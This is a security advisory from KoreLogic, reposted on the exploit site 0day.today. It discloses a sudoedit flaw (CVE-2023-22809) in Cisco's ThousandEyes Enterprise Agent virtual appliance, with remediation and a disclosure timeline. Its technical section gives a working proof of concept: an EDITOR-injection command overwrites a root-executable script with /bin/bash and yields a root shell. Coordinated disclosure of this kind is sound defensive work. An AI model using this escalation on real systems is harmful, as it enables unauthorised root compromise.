0day.today - 最大、世界でのデータベースを利用します。
あなたは0day.today について知っておくべきこと:
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
- 私たちは一つのメインのドメインを使用します。http://0day.today
- 材料のほとんどは 完全に無料
- あなたがしたい場合は エクスプロイトを購入 / V.I.P.を取得アクセス または任意の他のサービスのために支払います、
あなたが購入したり、獲得する必要があります 金
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
次の方法でご連絡することができます:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification Vulnerability
Title: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoedit Advisory ID: KL-001-2023-003 Publication Date: 2023.08.17 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-003.txt 1. Vulnerability Details Affected Vendor: ThousandEyes Affected Product: ThousandEyes Enterprise Agent Virtual Appliance Affected Version: thousandeyes-va-64-18.04 0.218 Platform: Linux / Ubuntu 18.04 CWE Classification: CWE-1395: Dependency on Vulnerable Third-Party Component CVE ID: CVE-2023-22809 2. Vulnerability Description An unpatched vulnerability in 'sudoedit', allowed by sudo configuration, permits a low-privilege user to modify arbitrary files as root and subsequently execute arbitrary commands as root. 3. Technical Description The ThousandEyes Virtual Appliance is distributed with a restrictive set of commands that can be executed via sudo, without having to provide the password for the 'thousandeyes' account. However, the ability to execute sudoedit of a specific file (/etc/hosts) via sudo is permitted without requiring the password. The sudoedit binary can be abused to allow the modification of any file on the filesystem. This is a known security vulnerability (per https://seclists.org/oss-sec/2023/q1/42), but had not been disclosed for the ThousandEyes Virtual Appliance. This can be abused to allow root-level compromise of the virtual appliance. thousandeyes@thousandeyes-va:~$ id uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare) thousandeyes@thousandeyes-va:~$ sudo -l Matching Defaults entries for thousandeyes on thousandeyes-va: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User thousandeyes may run the following commands on thousandeyes-va: (ALL : ALL) ALL (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent, /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-* (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump Here we see that /usr/local/bin/te-* are executable as root with no password. Even though sudoedit is only permitted to edit /etc/hosts, we can use EDITOR= to spawn vim to edit an arbitrary file. Pick one of those scripts because we can then execute it: thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config /usr/local/bin/te-set-config: Python script, ASCII text executable thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts sudoedit: --: editing files in a writable directory is not permitted 2 files to edit sudoedit: /etc/hosts unchanged thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config /usr/local/bin/te-set-config: ASCII text thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config /bin/bash thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config root@thousandeyes-va:~# id uid=0(root) gid=0(root) groups=0(root) root@thousandeyes-va:~# 4. Mitigation and Remediation Recommendation The vendor has released a version which remediates the described vulnerability. Release notes are available at: https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf18994 5. Credit This vulnerability was discovered by Jim Becher of KoreLogic, Inc. 6. Disclosure Timeline 2023.04.26 - KoreLogic submits vulnerability details to Cisco. 2023.04.26 - Cisco acknowledges receipt and the intention to investigate. 2023.05.04 - Cisco notifies KoreLogic that a remediation for this vulnerability is expected to be available within 90 days. 2023.06.30 - 45 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2023.07.11 - Cisco informs KoreLogic that the issue has been remediated in the latest ThousandEyes Virtual Appliance and a Third Party Software Release Note Enclosure will be released 2023.08.16. Cisco provides CVE-2023-22809 to track this vulnerability. 2023.07.24 - 60 business days have elapsed since KoreLogic reported this vulnerability to the vendor. 2023.08.16 - Cisco public acknowledgement. 2023.08.17 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2023 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ # 0day.today [2024-07-01] #